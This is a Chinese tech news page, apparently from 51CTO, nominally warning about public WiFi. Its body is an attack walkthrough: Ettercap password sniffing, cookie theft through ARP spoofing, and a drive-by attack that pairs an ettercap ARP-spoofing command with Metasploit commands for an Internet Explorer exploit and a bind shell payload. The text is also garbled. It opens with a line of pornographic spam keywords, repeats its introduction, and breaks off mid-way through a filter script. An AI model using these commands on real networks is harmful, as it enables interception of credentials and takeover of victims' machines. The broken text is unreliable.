自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

專家:小心使用公共場所WiFi

新聞
隨著智能手機和各類終端(如iPAD)的普及,越來越多的用戶喜歡使用它們進行網上沖浪、網上購物、手機網銀操作等。這些設備都提供了WiFi接入的功能,目前在很多公共場所都提供了免費的Wifi的熱點,所以很多用戶都會使用這些免費的WiFi進行上網操作。隨著WiFi的普及,打WiFi主意的黑客也逐漸多了起來。

隨著智能手機和各類終端(如iPAD)的普及,越來越多的用戶喜歡使用它們進行網上沖浪、網上購物、手機網銀操作等。這些設備都提供了WiFi接入的功能,目前在很多公共場所都提供了免費的Wifi的熱點,所以很多用戶都會使用這些免費的WiFi進行上網操作。隨著WiFi的普及,打WiFi主意的黑客也逐漸多了起來。下面我就分析一下他們的做法:

一、密碼嗅探

1、使用Ettercap嗅探工具

2、選擇用于嗅探數據包的網絡接口

3、探測局域網內的主機列表

4、添加嗅探目標,并開始執(zhí)行嗅探

5、這時如果源和目標主機進行了數據通信,且涉及到了疑是用戶名密碼等數據,捕獲的信息將會顯示

6、即使使用SSL的也同樣可以被嗅探到

7、其它可以嗅探的口令信息:TELNET、FTP、POP、RLOGIN、SSH1、ICQ、SMB、MySQL、HTTP、NNTP、 X11、NAPSTER、IRC、RIP、BGP、SOCK5、IMAP4、VNC、LDAP、NFS、SNMP、HALFLIFE、QUAKE3、 MSNYMSG。

二、盜取cookie

同樣使用Ettercap,然后使用arp欺騙實現:

三、arp掛馬

利用ARP 欺騙把數據流都引到本地,然后替換成我們事先準備好的掛馬代碼,再轉發(fā)出去。

ettercap -T -q -F ieexpft -M arp:remote /192.168.1.105/ // 表示對192.168.1.105主機進行arp欺騙 啟動Msf的使用

use exploit/windows/browser/ie_iepeers_pointer

set SRVHOST 192.168.1.103(攻擊者ip) Msf會自動為我們開啟類似服務 其他默認就可下面指定payload使用這個set PAYLOAD window/shell/bind_tcp Payload的選項保持默認就行默認綁定4444端口 目標:0 Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0

下面看一下ettercap的過濾腳本馬上開始 ettercap使用的過濾腳本 If(ip.proto == TCP && tcp.dst == 80) {

if (search(DATA.data,"Accept-Encoding")) {

replace("Accept-Encoding","Accept-Mousecat");

msg("zapped Accept-Encoding!\n");

}

}

if (ip.proto == TCP && tcp.src == 80) {

if (search(DATA.data, "") ){

replace("","

責任編輯:市場部 來源: 安恒信息
相關推薦

2012-02-29 17:29:11

2012-07-26 09:39:26

2019-01-28 05:04:31

物聯網公共安全IOT

2019-01-16 08:37:19

2011-09-13 13:07:42

WiFi

2020-02-07 12:29:02

物聯網技術智能城市

2013-07-26 15:23:45

飛魚星無線云飛魚星路由器飛魚星

2009-04-10 18:54:08

2011-08-11 13:17:48

2010-06-09 18:14:02

2017-12-19 15:04:06

Wi-Fi蹭網公共WiFi

2021-10-08 10:56:49

人臉識別人工智能數據

2019-01-24 09:53:49

2013-01-18 11:18:02

2024-07-02 17:30:08

2013-12-03 09:31:20

免費Wi-Fi趨勢科技

2012-10-12 13:56:55

2014-02-13 10:31:56

2017-08-14 13:46:20

免費WiFi流量運營商

2019-06-04 09:30:01

點贊
收藏

51CTO技術棧公眾號